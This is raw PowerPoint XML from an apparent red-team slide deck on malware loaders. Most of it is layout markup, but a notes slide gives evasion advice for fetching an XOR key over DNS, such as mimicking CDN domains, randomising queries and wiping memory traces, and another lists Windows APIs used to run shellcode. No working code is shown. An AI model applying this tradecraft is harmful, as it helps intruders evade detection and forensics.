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66" r:id="rId2"/>
    <p:sldId id="264" r:id="rId3"/>
    <p:sldId id="265" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="256" r:id="rId12"/>
    <p:sldId id="260" r:id="rId13"/>
    <p:sldId id="258" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="272" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="274" r:id="rId21"/>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592"/>
    <p:restoredTop sz="82163"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="185" d="100"/>
          <a:sy n="185" d="100"/>
        </p:scale>
        <p:origin x="78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2C5A6-4F3C-D84D-9221-1C111BE58B0C}" type="datetimeFigureOut">
              <a:t>17/05/2025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2C456-DB8C-ED4F-9E61-F11EE322FFA0}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38774684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a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4100067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GB" b="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>OPSEC Advantages:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Stealthy channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: DNS traffic is often less scrutinized than HTTP/HTTPS, and many environments allow outbound DNS queries, making it a covert method for key retrieval.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Low footprint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: DNS requests are lightweight, reducing the data volume that might trigger network monitoring.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Obfuscation potential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: You can encode the key in subdomains (e.g., key-part1.key-part2.example.com) or TXT records, blending with legitimate DNS traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>OPSEC Risks:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>DNS logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Many organizations log DNS queries, especially in enterprise environments with EDR or SIEM systems. Anomalous or repetitive queries to a suspicious domain could raise alerts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Domain attribution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: The domain used for key retrieval must be controlled and ideally appear benign. A compromised or poorly chosen domain (e.g., flagged as malicious) could expose the operation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Limited data capacity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: DNS responses (e.g., TXT records) have size constraints, so complex or long keys may require multiple queries, increasing the risk of detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Caching and persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: DNS responses may be cached by local resolvers, leaving traces of the key or query in the environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Best Practices for OPSEC with DNS-Based Key Retrieval:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Use legitimate-looking domains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Register domains that mimic common services (e.g., cloud or CDN providers) to blend in with normal traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Randomize queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Rotate subdomains or use pseudo-random patterns to avoid predictable query signatures (e.g., rand123.example.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Encrypt or obfuscate the key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Encode the key in the DNS response (e.g., base64 or custom encoding) to make it harder to interpret if intercepted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Minimize queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Retrieve the key in a single request if possible, using TXT or AAAA records to maximize data capacity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Wipe traces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Ensure the loader clears the key from memory immediately after use to reduce forensic exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Fallback mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Implement a local key derivation fallback (e.g., based on system artifacts) in case DNS resolution fails or is blocked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:effectLst/>
              </a:rPr>
              <a:t>: Fetching the XOR key via DNS can be OPSEC-friendly due to its stealthy nature and low bandwidth, but it’s not foolproof. DNS logging and domain attribution are key risks. For optimal OPSEC, combine DNS retrieval with obfuscation, randomization, and minimal queries, or consider local key derivation to eliminate network dependency altogether. Evaluate the target environment’s DNS monitoring capabilities to assess feasibility.</a:t>
            </a:r>
          </a:p>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20947899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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27901381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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36887435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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8358553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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279284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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7934159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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315272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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2146342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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2253465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https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F072C456-DB8C-ED4F-9E61-F11EE322FFA0}" type="slidenum">
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1664884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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9965641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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F072C456-DB8C-ED4F-9E61-F11EE322FFA0}" type="slidenum">
              <a:rPr lang="en-BE"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3113566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41E42-83FC-A793-CC59-6B315E41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5259D7-9756-BFFF-D63C-17DAD1FD0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E64830-3A5B-1319-7D13-B44DB4CFF8DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6AC7054-6109-811A-ADEC-335E8063E5B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F072C456-DB8C-ED4F-9E61-F11EE322FFA0}" type="slidenum">
              <a:rPr lang="en-BE"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33071099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C7EB0-FD68-C911-6FEE-A1126AA4E02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DF54156B-E477-EBBF-DB58-6A9853FF82A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F3A5A122-9B68-7115-8A56-B9FF9AE96701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40A0E77B-F874-1CF4-CB8A-6434B90CADD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D2AC7DA7-6573-D37F-44CA-A25C4C6B1B71}"/>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71051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FBC93-E28A-DCA1-86F1-5BDB9B93E605}"/>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710ED448-95D6-A92E-4139-FCBC0B89E17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923C8612-A121-6041-16B9-770E99E5E5E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D6E3068-A8A4-981A-DAE5-DBD1E4B1C899}"/>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4C9D831-8079-52F8-022A-24ED59543B43}"/>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120823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614192-E250-AC57-D5AB-75CD2F4D6703}"/>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22090C84-EA5C-3F52-C6F2-7D98B1F8161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52E3F53-3D9D-862F-F920-8245B404F853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC3FD39-FFB5-FD80-EB4D-EC718CD778B4}"/>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AA9E641E-DF8B-B5F7-DE08-521EFFCE7F90}"/>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0364159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9A635-532B-BE07-9D06-0B7F69E23151}"/>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B38680EA-D6A9-11A6-2F82-7C019A4C02E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B7DEA67A-067F-90DE-F6D6-5789BD65E4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AE1E636-152A-1ADD-1EDB-C1D51F2528B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5E5764B0-246C-B6EB-93DC-5C8DEA85CAD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634803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7EF93-BC45-491A-73C5-CE86ECDC381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8A226B78-F10C-10C4-446B-6A037310AB4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C1BA753-581A-5AB3-B58C-0DE00A1E58AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F601742-CDC4-29FB-9AAF-B1BAC9B246A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8F148548-AE7F-1166-82CD-E67B132E22FD}"/>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096789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201EB-963E-F2D0-8FEB-6B3CC3F8E566}"/>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3ABF4A5D-FCCD-83AC-4AE3-F3870123338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9CF87436-AA44-B818-61A6-FBFABC7F937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B71798A7-ACFC-9116-5F4F-C583DB4B0DCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63233DC3-1BC3-36CA-4A0F-ACC6DE766A3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08A0BA0F-C8D7-7EA8-2161-5D89D6DB9BD4}"/>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3348370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27350-AFC9-D261-6879-FC5BEABA0EC4}"/>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19675E34-D400-A8A8-9134-31DA786FF4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E2A13CDA-E558-A8F5-1C78-3D52F08B7CC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E475BA5E-4313-8A6C-E1B7-D6DF72140B0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032DAE-7F1D-7DB3-9008-DD26A5E5DE74}"/>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43378AA8-3916-E53F-DF3D-9A6E9A49C4B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A86EBE-F62F-8259-4DA8-DD23AE6EE899}"/>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54CA00BE-A5A9-36FD-3989-7A3DE849530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683697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694AF-7B90-E28C-5223-8872946C64FC}"/>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CABAADB1-FDE5-37CC-8322-CDC43DFB23FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0612A106-C0EC-87EE-5D72-0AF6B069BE49}"/>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07CBDD0D-2E15-8EA5-83C4-78F46CC8347B}"/>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912295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FA0D21-02F2-49BA-1F9C-852AAF58E71F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECC4BDAC-CD9C-78FD-5ED8-62C056D34525}"/>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F88A0010-EEF3-E26D-BBB4-2825BDD7C3F6}"/>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2471475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EB182-9E23-CD8F-98BC-1382118639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5A61E6F3-C986-CEDB-815A-8DE2AFAFCC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A37C8323-A4DE-0543-1D4E-B3791E3BB2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F2C8683-FD80-4AD1-B765-6A4BB787764A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A32971-6F0C-DF91-BF8B-D46A115C69C8}"/>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7B145D68-0017-409C-47FD-B5C6379EF985}"/>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2859784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5A502-027C-967B-7E20-15E6CBE40D3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398BBE84-9563-8AF7-E58E-4699BA7DFE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B43FD3BB-F398-0382-5478-B3F0D76E9F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5E6F304-2B60-CDDF-CE3A-BB18ECD3CC12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>17/05/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
